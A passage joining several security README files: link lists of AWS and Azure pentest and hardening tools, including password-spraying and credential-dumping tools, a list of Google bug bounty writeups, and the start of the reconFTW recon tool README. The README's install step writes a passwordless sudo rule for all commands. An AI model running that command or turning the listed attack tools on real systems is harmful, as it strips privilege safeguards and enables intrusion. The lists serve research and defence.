https://github.com/lamkeysing92/aws-pentest-inventory - https://github.com/dagrz/aws_pwn - https://github.com/appsecco/breaking-and-pwning-apps-and-servers-aws-azure-training ## AWS Security - Defensive: Hardening, Security Assessment and Inventory - https://github.com/nccgroup/ScoutSuite - https://github.com/toniblyx/prowler - https://github.com/cloudsploit/scans - https://github.com/duo-labs/cloudmapper - https://github.com/duo-labs/cloudtracker - https://github.com/awslabs/aws-security-benchmark - https://github.com/arkadiyt/aws_public_ips - https://github.com/nccgroup/PMapper - https://github.com/nccgroup/aws-inventory - https://github.com/disruptops/resource-counter - https://github.com/Teevity/ice - https://github.com/cyberark/SkyArk - https://github.com/willbengtson/trailblazer-aws - https://github.com/lateralblast/lunar - https://github.com/tensult/cloud-reports - https://github.com/tmobile/pacbot - https://github.com/SecurityFTW/cs-suite - https://github.com/te-papa/aws-key-disabler - https://github.com/turnerlabs/antiope - https://github.com/lyft/cartography - https://github.com/mlabouardy/komiser - https://github.com/darkarnium/perimeterator - https://github.com/DenizParlak/Zeus - https://github.com/darkbitio/aws-recon - https://github.com/mhlabs/iam-policies-cli - https://github.com/toniblyx/my-arsenal-of-aws-security-tools - https://github.com/jassics/awesome-aws-security - https://docs.aws.amazon.com/securityhub/latest/userguide/securityhub-standards-cis.html ## PenTest in Azure - Enumeration - o365creeper - Enumerate valid email addresses - CloudBrute - Tool to find a cloud infrastructure of a company on top Cloud providers - cloud_enum - Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud - Azucar - Security auditing tool for Azure environments - CrowdStrike Reporting Tool for Azure (CRT) - Query Azure AD/O365 tenants for hard to find permissions and configuration settings - ScoutSuite - Multi-cloud security auditing tool. Security posture assessment of different cloud environments. - BlobHunter - A tool for scanning Azure blob storage accounts for publicly opened blobs - Grayhat Warfare - Open Azure blobs and AWS bucket search - Information Gathering - o365recon - Information gathering with valid credentials to Azure - Get-MsolRolesAndMembers.ps1 - Retrieve list of roles and associated role members - ROADtools - Framework to interact with Azure AD - PowerZure - PowerShell framework to assess Azure security - Azurite - Enumeration and reconnaissance activities in the Microsoft Azure Cloud - Sparrow.ps1 - Helps to detect possible compromised accounts and applications in the Azure/M365 environment - Hawk - Powershell based tool for gathering information related to O365 intrusions and potential breaches - Microsoft Azure AD Assessment - Tooling for assessing an Azure AD tenant state and configuration - Lateral Movement - Stormspotter - Azure Red Team tool for graphing Azure and Azure Active Directory objects - AzureADLateralMovement - Lateral Movement graph for Azure Active Directory - SkyArk - Discover, assess and secure the most privileged entities in Azure and AWS - Exploitation - MicroBurst - A collection of scripts for assessing Microsoft Azure security - azuread_decrypt_msol_v2.ps1 - Decrypt Azure AD MSOL service account - Credential Attacks - MSOLSpray - A password spraying tool for Microsoft Online accounts (Azure/O365) - MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services Resources - adconnectdump - Dump Azure AD Connect credentials for Azure AD and Active Directory - Abusing Azure AD SSO with the Primary Refresh Token - Abusing dynamic groups in Azure AD for Privilege Escalation - Attacking Azure, Azure AD, and Introducing PowerZure - Attacking Azure & Azure AD, Part II - Azure AD Connect for Red Teamers - Azure AD Introduction for Red Teamers - Azure AD Pass The Certificate - Azure AD privilege escalation - Taking over default application permissions as Application Admin - Defense and Detection for Attacks Within Azure - Hunting Azure Admins for Vertical Escalation - Impersonating Office 365 Users With Mimikatz - Lateral Movement from Azure to On-Prem AD - Malicious Azure AD Application Registrations - Moving laterally between Azure AD joined machines - CrowdStrike Launches Free Tool to Identify and Help Mitigate Risks in Azure Active Directory - Privilege Escalation Vulnerability in Azure Functions - Azure Application Proxy C2 - Recovering Plaintext Passwords from Azure Virtual Machines like It’s the 1990s - Azure Articles from NetSPI - Azure Cheat Sheet on CloudSecDocs - Resources about Azure from Cloudberry Engineering - Resources from PayloadsAllTheThings - Encyclopedia on Hacking the Cloud - (No content yet for Azure) - azure-security-lab - Securing Azure Infrastructure - Hands on Lab Guide - AzureSecurityLabs - Hands-on Security Labs focused on Azure IaaS Security - Building Free Active Directory Lab in Azure - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md - https://github.com/MicrosoftDocs/azure-docs/blob/master/articles/security/fundamentals/pen-testing.md - https://github.com/swiftsolves-msft/AzurePenTestScope ## Azure Security - https://github.com/LennonCMJ/pentest_script/blob/master/Azure_Testing.md - https://github.com/dafthack/CloudPentestCheatsheets - https://github.com/mattrotlevi/lava - https://github.com/Azure/Azure-Security-Center - https://github.com/kmcquade/awesome-azure-security - https://github.com/MicrosoftLearning/AZ-500-Azure-Security - https://github.com/Azure/Azure-Network-Security - https://github.com/MicrosoftDocs/SecurityBenchmarks - https://microsoftlearning.github.io/AZ500-AzureSecurityTechnologies/ - https://www.cisecurity.org/benchmark/azure/
# Awesome Google VRP Writeups 🐛 A list of writeups from the Google VRP Bug Bounty program *\*writeups: **not just** writeups* ## Contributing: If you have/know of any Google writeups not listed in this repository, feel free to open a Pull Request. Please try to sort the writeups by publication date. The template to follow when adding new writeups: ``` - **[MONTH DAY - $BOUNTY]** [TITLE](URL) by [NAME](TWITTER_URL) ``` *If the bounty amount is not available, write `$???`.*<br> *If no Twitter account is available, try finding something similar, like other social media page or website.* ### Contributors: [David Schütz](https://twitter.com/xdavidhu), [Alex Birsan](https://twitter.com/alxbrsn), [Dan Maas](https://www.linkedin.com/in/dan-maas-66b2a045/), [wis4nggeni](https://twitter.com/_wis4nggeni), [Thomas Orlita](https://twitter.com/ThomasOrlita), [CaptainFreak](https://twitter.com/0xCaptainFreak), [Akshansh Jaiswal](https://twitter.com/akshanshjaiswl), [Nihal](https://twitter.com/iamnihal_), [Sriram](https://www.twitter.com/sriramoffcl/), [Nosa Shandy](https://apapedulimu.click), [Peter Gasper](https://twitter.com/viralpoetry), [Abartan Dhakal](https://twitter.com/imhaxormad), [Syahri Ramadan](https://twitter.com/LocalHost31337), [Omar Espino](https://twitter.com/omespino) Thank you! 🎉 ## Blog posts: ### 2020: - **[Dec 22 - $0]** [SSTI in Google Maps](https://www.ehpus.com/post/ssti-in-google-maps) by [Zohar Shacha](https://www.linkedin.com/in/zohar-shachar/) - **[Dec 19 - $0]** [Google VRP – Sandboxed RCE as root on Apigee API proxies](https://omespino.com/write-up-google-vrp-n-a-sandboxed-rce-as-root-on-apigee-api-proxies/) by [Omar Espino](https://twitter.com/omespino) - **[Nov 12 - $31,337]** [31k$ SSRF in Google Cloud Monitoring led to metadata exposure](https://nechudav.blogspot.com/2020/11/31k-ssrf-in-google-cloud-monitoring.html) by [David Nechuta](https://twitter.com/david_nechuta) - **[Oct 08 - $30,000]** [The mass CSRFing of \*.google.com/\* products.](http://www.missoumsai.com/google-csrfs.html) by [Missoum Said](https://twitter.com/missoum1307) - **[Oct 01 - $5,000]** [Google bug bounty: XSS to Cloud Shell instance takeover (RCE as root) - $5,000 USD](https://omespino.com/write-up-google-bug-bounty-xss-to-cloud-shell-instance-takeover-rce-as-root-5000-usd/) by [Omar Espino](https://twitter.com/omespino) - **[Sept 29 - $???]** [Public Bucket Allowed Access to Images on Upcoming Google Cloud Blog Posts](https://websecblog.com/vulns/public-google-cloud-blog-bucket/) by [Thomas Orlita](https://twitter.com/ThomasOrlita) - **[Sept 20 - $500]** [How I earned $500 from Google - Flaw in Authentication](https://medium.com/bugbountywriteup/how-i-earned-500-from-google-flaw-in-authentication-a40018c05616/) by [Hemant Patidar](https://twitter.com/HemantSolo) - **[Sept 08 - $10,000]** [XSS->Fix->Bypass: 10000$ bounty in Google Maps](https://www.ehpus.com/post/xss-fix-bypass-10000-bounty-in-google-maps) by [Zohar Shacha](https://www.linkedin.com/in/zohar-shachar/) - **[Aug 26 - $???]** [Auth bypass: Leaking Google Cloud service accounts and projects](https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) - **[Aug 25 - $1,337]** [How I Tracked Your Mother: Tracking Waze drivers using UI elements](https://www.malgregator.com/post/waze-how-i-tracked-your-mother/) by [Peter Gasper](https://github.com/viralpoetry) - **[Aug 22 - $???]** [The Short tale of two bugs on Google Cloud Product— Google VRP [Resolved]](https://medium.com/bugbountywriteup/the-short-tale-of-two-bugs-on-google-cloud-product-google-vrp-resolved-47c913dca8fc) by [Sriram](https://twitter.com/sriramoffcl) - **[Aug 19 - $???]** [The Confused Mailman: Sending SPF and DMARC passing mail as any Gmail or G Suite customer](https://ezh.es/blog/2020/08/the-confused-mailman-sending-spf-and-dmarc-passing-mail-as-any-gmail-or-g-suite-customer/) by [Allison Husain](https://twitter.com/ezhes_) - **[Aug 18 - $???]** [How to contact Google SRE: Dropping a shell in Cloud SQL](https://www.ezequiel.tech/2020/08/dropping-shell-in.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) - **[Aug 18 - $???]** [Three More Google Cloud Shell Bugs Explained](https://blog.daviddworken.com/posts/cloud-shell-bugs-explained/) by [David Dworken](https://twitter.com/ddworken) - **[Aug 15 - $???]** [How I was able to send Authentic Emails as others - Google VRP [Resolved]](https://medium.com/@sriram_offcl/how-i-was-able-to-send-authentic-emails-as-others-google-vrp-resolved-2af94295f326) by [Sriram](https://www.twitter.com/sriramoffcl/) - **[July 28 - $1,337]** [Authorization bypass in Google’s ticketing system (Google-GUTS)](https://www.ehpus.com/post/authorization-bypass-in-google-s-ticketing-system) by [Zohar Shacha](https://www.linkedin.com/in/zohar-shachar/) - **[July 17 - $5,000]** [Idor in google product](https://medium.com/@balook/idor-in-google-datastudio-google-com-f2fa51b763de) by [baluz](https://twitter.com/critical_b0y) - **[June 15 - $3,133.7]** [SMTP Injection in Gsuite](https://www.ehpus.com/post/smtp-injection-in-gsuite) by [Zohar Shacha](https://www.linkedin.com/in/zohar-shachar/) - **[June 6 - $500]** [How i earned $500 from google by change one character .](https://medium.com/@odayalhalbe1/how-i-earned-500-from-google-by-change-one-character-8350d2b618e5) by [Oday Alhalbe](https://bughunter.withgoogle.com/profile/91a2e03b-0b0d-422c-9cd6-aa2a2ae24b57) - **[June 4 - $???]** [Privilege Escalation in Google Cloud Platform's OS Login](https://gitlab.com/gitlab-com/gl-security/gl-redteam/red-team-tech-notes/-/tree/master/oslogin-privesc-june-2020) by [Chris Moberly](https://twitter.com/init_string) - **[May 21 - $31,337]** [RCE in Google Cloud Deployment Manager](https://www.ezequiel.tech/2020/05/rce-in-cloud-dm.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) - **[May 10 - $???]** [Bypassing Firebase authorization to create custom goo.gl subdomains](https://websecblog.com/vulns/bypassing-firebase-authorization-to-create-custom-goo-gl-subdomains/) by [Thomas Orlita](https://twitter.com/ThomasOrlita) - **[May 8 - $4133.70]** [Bypass XSS filter using HTML Escape](https://medium.com/@adonkidz7/bypass-xss-filter-using-html-escape-f2e06bebc8c3) by [Syahri Ramadan](https://twitter.com/adonkidz7) - **[May 7 - $3,133.7]** [DOM-Based XSS at accounts.google.com by Google Voice Extension](http://www.missoumsai.com/google-accounts-xss.html) by [Missoum Said](https://twitter.com/missoum1307) - **[May 7 - $???]** [Google Acquisition XSS (Apigee)](https://medium.com/@TnMch/google-acquisition-xss-apigee-5479d7b5dc4) by [TnMch](https://twitter.com/TnMch_) - **[May 3 - $???]** [DOM XSS in Gmail with a little help from Chrome](https://opnsec.com/2020/05/dom-xss-in-gmail-with-a-little-help-from-chrome/) by [Enguerran Gillier](https://twitter.com/opnsec) - **[Apr 30 - $6,267.4]** [Researching Polymorphic Images for XSS on Google Scholar](https://blog.doyensec.com/2020/04/30/polymorphic-images-for-xss.html) by [Lorenzo Stella](https://twitter.com/doyensec) - **[March 27 - $3,133.7]** [$3133.7 Google Bug Bounty Writeup- XSS Vulnerability!](https://pethuraj.com/blog/google-bug-bounty-writeup/) by [Pethuraj M](https://twitter.com/itsmepethu) - **[March 7 - $5,000]** [Google Ads Self-XSS & Html Injection $5000](https://medium.com/@adonkidz7/google-ads-self-xss-html-injection-5000-52280da76c80) by [Syahri Ramadan](https://twitter.com/adonkidz7) - **[March 8 - $6,000]** [The unexpected Google wide domain check bypass](https://bugs.xdavidhu.me/google/2020/03/08/the-unexpected-google-wide-domain-check-bypass/) by [David Schütz](https://twitter.com/xdavidhu) - **[Jan 12 - $???]** [Information Disclosure Vulnerability in the Google Cloud Speech-to-Text API](https://www.dcine.com/2020/01/12/information-disclosure-vulnerability-in-the-google-cloud-speech-to-text-api/) by [Dan Maas](https://www.linkedin.com/in/dan-maas-66b2a045/) ### 2019: - **[Dec 30 - $3,133.7]** [How did I earn $3133.70 from Google Translator? (XSS)](https://medium.com/monetary/how-did-i-earn-3133-70-from-google-translator-9becf942dbdc) by [Beri Bey](https://medium.com/@beribeys) - **[Dec 19 - $???]** [SSRF in Google Cloud Platform StackDriver](https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver/) by [Ron Chan](https://twitter.com/ngalongc) - **[Dec 16 - $???]** [4 Google Cloud Shell bugs explained](https://offensi.com/2019/12/16/4-google-cloud-shell-bugs-explained-introduction/) by [Wouter ter Maat](https://twitter.com/wtm_offensi) - **[Dec 15 - $5,000]** [The File uploading CSRF in Google Cloud Shell Editor](https://obmiblog.blogspot.com/2019/12/gcp-5k-file-uploading-csrf.html) by [Obmi](https://bughunter.withgoogle.com/profile/40997bbc-945a-4eca-8408-eed302641c96) - **[Dec 15 - $5,000]** [The oauth token hijacking in Google Cloud Shell Editor](https://obmiblog.blogspot.com/2019/12/gcp-5k-oauth-token-hijack.html) by [Obmi](https://bughunter.withgoogle.com/profile/40997bbc-945a-4eca-8408-eed302641c96) - **[Dec 15 - $5,000]** [The XSS ( type II ) in Google Cloud Shell Editor](https://obmiblog.blogspot.com/2019/12/gcp-5k-xss-type-ii.html) by [Obmi](https://bughunter.withgoogle.com/profile/40997bbc-945a-4eca-8408-eed302641c96) - **[Nov 29 - $1,337]** [Writeup for the 2019 Google Cloud Platform VRP Prize!](https://medium.com/@missoum1307/writeup-for-the-2019-google-cloud-platform-vrp-prize-4e104ef9f204) by [Missoum Said](https://twitter.com/missoum1307) - **[Nov 18 - $???]** [XSS in GMail’s AMP4Email via DOM Clobbering](https://research.securitum.com/xss-in-amp4email-dom-clobbering/) by [Michał Bentkowski](https://twitter.com/SecurityMB) - **[Sep 09 - $???]** [Combination of techniques lead to DOM Based XSS in Google](http://sasi2103.blogspot.com/2016/09/combination-of-techniques-lead-to-dom.html) by [Sasi Levi](https://twitter.com/sasi2103) - **[Aug 31 - $36,337]** [$36k Google App Engine RCE](https://www.ezequiel.tech/p/36k-google-app-engine-rce.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) - **[July 20 - $13,337]** [Into the Borg – SSRF inside Google production network](https://opnsec.com/2018/07/into-the-borg-ssrf-inside-google-production-network/) by [Enguerran Gillier](https://twitter.com/opnsec) - **[ July 10 - $???]** [Gsuite Hangouts Chat 5k IDOR](https://secreltyhiddenwriteups.blogspot.com/2018/07/gsuite-hangouts-chat-5k-idor.html) by [Cameron Vincent](https://twitter.com/secretlyhidden1) - **[May 21 - $13,337]** [Google Bug Bounty: LFI on Production Servers in “springboard.google.com” – $13,337 USD](https://omespino.com/write-up-google-bug-bounty-lfi-on-production-servers-in-redacted-google-com-13337-usd/) by [Omar Espino](https://twitter.com/omespino) - **[March 29 - $0]** [Inserting arbitrary files into anyone’s Google Earth Projects Archive](https://websecblog.com/vulns/google-earth-studio-vulnerability/) by [Thomas Orlita](https://twitter.com/ThomasOrlita) - **[March 26 $3,133.7]** [How I could have hijacked a victim’s YouTube notifications!](https://hackademic.co.in/youtube-bug/) by [Yash Sodha](https://twitter.com/y_sodha) - **[Feb 12 - $???]** [Hacking YouTube for #fun and #profit](https://www.linkedin.com/pulse/hacking-youtube-fun-profit-alexandru-coltuneac/) by [Alexandru Coltuneac](https://twitter.com/dekeeu) - **[Jan 31 - $???]** [LFI in Apigee portals](https://offensi.com/2019/01/31/lfi-in-apigee-portals/) by [Wouter ter Maat](https://twitter.com/wtm_offensi) - **[Jan 30 - $7,500]** [$7.5k Google Cloud Platform organization issue](https://www.ezequiel.tech/2019/01/75k-google-cloud-platform-organization.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) - **[Jan 18 - $10,000]** [$10k host header](https://www.ezequiel.tech/p/10k-host-header.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) ### 2018: - **[Dec 12 - $???]** [XSSing Google Code-in thanks to improperly escaped JSON data](https://websecblog.com/vulns/google-code-in-xss/) by [Thomas Orlita](https://twitter.com/ThomasOrlita) - **[Dec 11 - $???]** [Clickjacking DOM XSS on Google.org](https://websecblog.com/vulns/clickjacking-xss-on-google-org/) by [Thomas Orlita](https://twitter.com/ThomasOrlita) - **[Dec 05 - $500]** [Billion Laugh Attack in https://sites.google.com](https://blog.intothesymmetry.com/2018/12/billion-laugh-attack-in.html) by [Antonio Sanso](https://twitter.com/asanso) - **[Nov 19 - $???]** [XS-Searching Google’s bug tracker to find out vulnerable source code](https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549) by [Luan Herrera](https://twitter.com/lbherrera_) - **[Nov 25 - $???]** [XSS in Google's Acquisition](https://www.secjuice.com/google-hall-of-fame/) by [Abartan Dhakal](https://twitter.com/imhaxormad) - **[Nov 11 - $7,500]** [Clickjacking on Google MyAccount Worth 7,500$](https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/) by [Apapedulimu](https://twitter.com/LocalHost31337) - **[Oct 04 - $???]** [GoogleMeetRoulette: Joining random meetings](https://www.martinvigo.com/googlemeetroulette/) by [Martin Vigo](https://twitter.com/martin_vigo) - **[Sep 05 - $???]** [Reflected XSS in Google Code Jam](https://websecblog.com/vulns/reflected-xss-in-google-code-jam/) by [Thomas Orlita](https://twitter.com/ThomasOrlita) - **[Aug 22 - $???]** [Liking GitHub repositories on behalf of other users — Stored XSS in WebComponents.org](https://websecblog.com/vulns/stored-xss-in-webcomponents-org/) by [Thomas Orlita](https://twitter.com/ThomasOrlita) - **[Aug - $???]** [Unauth meetings access](https://sites.google.com/securifyinc.com/vrp-writeups/google-meet/authorization-bugs) by [Rojan Rijal](https://twitter.com/mallocsys) - **[May 25 - $???]** [Waze remote vulnerabilities](http://blog.appscan.io/index.php/2018/05/25/waze-remote-vulnerability-technical-report/) by [PanguTeam](https://twitter.com/PanguTeam) - **[March 31 - $5,000]** [$5k Service dependencies](https://www.ezequiel.tech/p/5k-service-dependencies.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) - **[March 28 - $???]** [Stored XSS on biz.waze.com](https://sites.google.com/securifyinc.com/vrp-writeups/waze/waze-xss) by [Rojan Rijal](https://twitter.com/mallocsys) - **[Mar 07 - $13,337]** [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) by [Craig Arendt](https://twitter.com/signalchaos) - **[Feb 24 - $13,337]** [Bypassing Google’s authentication to access their Internal Admin panels](https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-panels-12acd3d821e3) by [Vishnu Prasad P G](https://twitter.com/vishnuprasadnta) - **[Feb 19 - $???]** [Google bugs stories and the shiny pixelbook](https://bughunt1307.herokuapp.com/googlebugs.html) by [Missoum Said](https://twitter.com/missoum1307) - **[Feb 14- $7,500]** [$7.5k Google services mix-up](https://www.ezequiel.tech/p/75k-google-services-mix-up.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) ### 2017: - **[Oct 30 - $15,600]** [How I hacked Google’s bug tracking system itself for $15,600 in bounties](https://medium.com/@alex.birsan/messing-with-the-google-buganizer-system-for-15-600-in-bounties-58f86cc9f9a5) by [Alex Birsan](https://twitter.com/alxbrsn) - **[Aug - $5,000]** [Google VRP : oAuth token stealing](http://bugdisclose.blogspot.com/2017/08/google-vrp-oauth-token-stealing.html) by [Harsh Jaiswal](https://twitter.com/rootxharsh) - **[Mar 09 - $5,000]** [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff) by [Marin Moulinier](https://github.com/marin-m) - **[Feb 26 - $3,133.7]** [Exploiting Clickjacking Vulnerability To Steal User Cookies](https://jasminderpalsingh.info/exploiting-google-clickjacking-vulnerability-to-steal-user-cookies/) by [Jasminder Pal Singh](https://twitter.com/Singh_Jasminder) - **[Jan - $???]** [Ok Google, Give Me All Your Internal DNS Information!](https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/) by [Julien Ahrens](https://twitter.com/MrTuxracer) - **[Jan 04 - $???]** [fastboot oem sha1sum](https://securityresear.ch/2017/01/04/fastboot-oem-sha1sum/) by [Roee Hay](https://twitter.com/roeehay) ### 2016: - **[Aug 26- $500]** [$500 getClass](https://www.ezequiel.tech/p/500-getclass.html) by [Ezequiel Pereira](https://twitter.com/epereiralopez) - **[Feb 28 - $???]** [Stored, Reflected and DOM XSS in Google for Work Connect (GWC)](http://respectxss.blogspot.com/2016/02/stored-reflected-and-dom-xss-in-google.html) by [Ashar Javed](https://twitter.com/soaj1664ashar) ### 2015: - **[Dec 8 - $???]** [Creative bug which result Stored XSS on m.youtube.com](http://sasi2103.blogspot.com/2015/12/creative-bug-which-result-stored-xss-on.html) by [Sasi Levi](https://twitter.com/sasi2103) - **[Oct 29 - $???]** [XSS in YouTube Gaming](http://respectxss.blogspot.com/2015/10/xss-in-youtube-gaming.html) by [Ashar Javed](https://twitter.com/soaj1664ashar) - **[June 26- $3,133.7]** [Youtube Editor XSS Vulnerability](https://jasminderpalsingh.info/youtube-editor-stored-dom-based-and-self-executed-xss-vulnerability/) by [Jasminder Pal Singh](https://twitter.com/Singh_Jasminder) ### 2014: - **[Oct 31 - $5,000]** [The 5000$ Google XSS](https://blog.it-securityguard.com/bugbounty-the-5000-google-xss/) by [Patrik Fehrenbach](https://twitter.com/itsecurityguard) - **[Oct 26 - $1,337]** [Youtube XSS Vulnerability [Stored -> Self Executed]](https://jasminderpalsingh.info/youtube-xss-vulnerability-stored-self-executed/) by [Jasminder Pal Singh](https://twitter.com/Singh_Jasminder) - **[Jan 10 - $???]** [Again, from Nay to Yay in Google Vulnerability Reward Program!](https://blog.yappare.com/2014/01/again-from-nay-to-yay-in-google.html) by [Ahmad Ashraff](https://twitter.com/yappare) - **[Aug 13 - $???]** [I hate you, so I pawn your Google Open Gallery](https://blog.yappare.com/2014/08/i-hate-you-so-i-pawn-your-google-open.html) by [Ahmad Ashraff](https://twitter.com/yappare) ### 2013: - **[Sep 15 - $3,133.7]** [XSRF and Cookie manipulation on google.com](https://blog.miki.it/2013/9/15/xsrf-cookie-setting-google/) by [Michele Spagnuolo](https://twitter.com/mikispag) - **[July 08 - $???]** [Stored XSS in GMail](https://blog.miki.it/2013/7/8/stored-xss-in-gmail/) ### Unknown Date: - **[??? - $???]** [XSS vulnerability in Google Cloud Shell’s code editor through mini-browser endpoint](https://ψ.fun/i/ZK9Kv) by [Psi](https://ψ.fun/) - **[??? - $???]** [Information leakage vulnerability in Google Cloud Shell’s proxy service](https://ψ.fun/i/KPMGz) by [Psi](https://ψ.fun/) - **[??? - $???]** [XSS vulnerability in Google Cloud Shell’s code editor through SVG files](https://ψ.fun/i/92uQC) by [Psi](https://ψ.fun/) - **[??? - $???]** [CSWSH vulnerability in Google Cloud Shell’s code editor](https://ψ.fun/i/yvpMj) by [Psi](https://ψ.fun/) - **[??? - $3,133.7]** [Open redirects that matter](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) by [Tomasz Bojarski](https://bughunter.withgoogle.com/profile/c25fa487-a4df-4e2e-b877-4d31d8964b82) - **[???- $???]** [Voice Squatting & Voice Masquerading Attack against Amazon Alexa and Google Home Actions](https://sites.google.com/site/voicevpasec/) by ??? - **[??? - $???]** [Blind XSS against a Googler](https://sites.google.com/securifyinc.com/vrp-writeups/hire-with-google/blind-xss) by [Rojan Rijal](https://twitter.com/mallocsys) - **[??? - $???]** [Multiple XSSs on hire.withgoogle.com](https://sites.google.com/securifyinc.com/vrp-writeups/hire-with-google/xsses) by [Rojan Rijal](https://twitter.com/mallocsys) - **[??? - $???]** [Auth Issues on hire.withgoogle.com](https://sites.google.com/securifyinc.com/vrp-writeups/hire-with-google/auth-issues) by [Rojan Rijal](https://twitter.com/mallocsys) - **[??? - $???]** [G Suite - Device Management XSS](https://sites.google.com/securifyinc.com/vrp-writeups/gsuite/bookmark-xss-device-management) by [Rojan Rijal](https://twitter.com/mallocsys) ## Videos: - **[2020 Jul 31]** [Script Gadgets! Google Docs XSS Vulnerability Walkthrough](https://www.youtube.com/watch?v=aCexqB9qi70) by [LiveOverflow](https://twitter.com/LiveOverflow/) - [$100k Hacking Prize - Security Bugs in Google Cloud Platform](https://www.youtube.com/watch?v=J2icGMocQds) by [LiveOverflow](https://twitter.com/LiveOverflow/) - [Google Bug Hunters](https://www.youtube.com/watch?v=DTXUMBc1zEc) by [Eduardo Vela Nava](https://twitter.com/sirdarckcat) - [Best Of Google VRP 2018](https://www.youtube.com/watch?v=mJwZfRXs83M) by [Daniel Stelter-Gliese](https://ch.linkedin.com/in/daniel-stelter-gliese-170a70a2) - [Great Bugs In Google VRP In 2016](https://www.youtube.com/watch?v=zs_nEJ9fh_4) by [Martin Straka and Karshan Sharma](https://nullcon.net/website/goa-2017/about-speakers.php) - [Google Cloud Platform vulnerabilities](https://www.youtube.com/watch?v=9pviQ19njIs) by [Ezequiel Pereira](https://twitter.com/epereiralopez) - [Google Paid Me to Talk About a Security Issue!](https://www.youtube.com/watch?v=E-P9USG6kLs) by [LiveOverflow](https://twitter.com/LiveOverflow/) - [War Stories from Google’s Vulnerability Reward Program](https://www.youtube.com/watch?v=QoE0M7v84ZU) by [Gábor Molnár](https://twitter.com/molnar_g) - [Secrets of the Google Vulnerability Reward Program](https://www.youtube.com/watch?v=ueEsOnHJZ80) by [Krzysztof Kotowicz](https://ch.linkedin.com/in/kkotowicz) - [XSS on Google Search - Sanitizing HTML in The Client?](https://www.youtube.com/watch?v=lG7U3fuNw3A) by [LiveOverflow](https://twitter.com/LiveOverflow/)
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.5.2"> <img src="https://img.shields.io/badge/release-v2.5.2-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/[email protected]"> </a> <a href="https://discord.gg/R5DdXVEdTy"> <img src="https://img.shields.io/discord/1048623782912340038.svg?logo=discord"> </a> </p> <h3 align="center">Summary</h3> **ReconFTW** automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. ReconFTW uses a lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you to get the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target. So, what are you waiting for? Go! Go! Go! :boom: 📔 Table of Contents ----------------- - [💿 Installation:](#-installation) - [a) In your PC/VPS/VM](#a-in-your-pcvpsvm) - [b) Docker Image 🐳 (3 options)](#b-docker-image--3-options) - [c) Terraform + Ansible](#c-terraform--ansible) - [⚙️ Config file:](#️-config-file) - [Usage:](#usage) - [Example Usage:](#example-usage) - [Axiom Support: :cloud:](#axiom-support-cloud) - [BBRF Support: :computer:](#bbrf-support-computer) - [Sample video:](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Vulnerability checks](#vulnerability-checks) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Makefile](#makefile) - [Manual](#manual) - [Main commands:](#main-commands) - [How to contribute:](#how-to-contribute) - [Need help? :information\_source:](#need-help-information_source) - [Support this project](#support-this-project) - [Buymeacoffee](#buymeacoffee) - [DigitalOcean referral link](#digitalocean-referral-link) - [GitHub sponsorship](#github-sponsorship) - [Sponsors ❤️](#sponsors-️) - [Thanks :pray:](#thanks-pray) - [Disclaimer](#disclaimer) --- # 💿 Installation: ## a) In your PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) Important : If you are not running reconftw as root, run `sudo echo "${USERNAME} ALL=(ALL:ALL) NOPASSWD: ALL" > /etc/sudoers.d/reconFTW` , to make sure no sudo prompts are required to run the tool and to avoid any permission issues. ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) 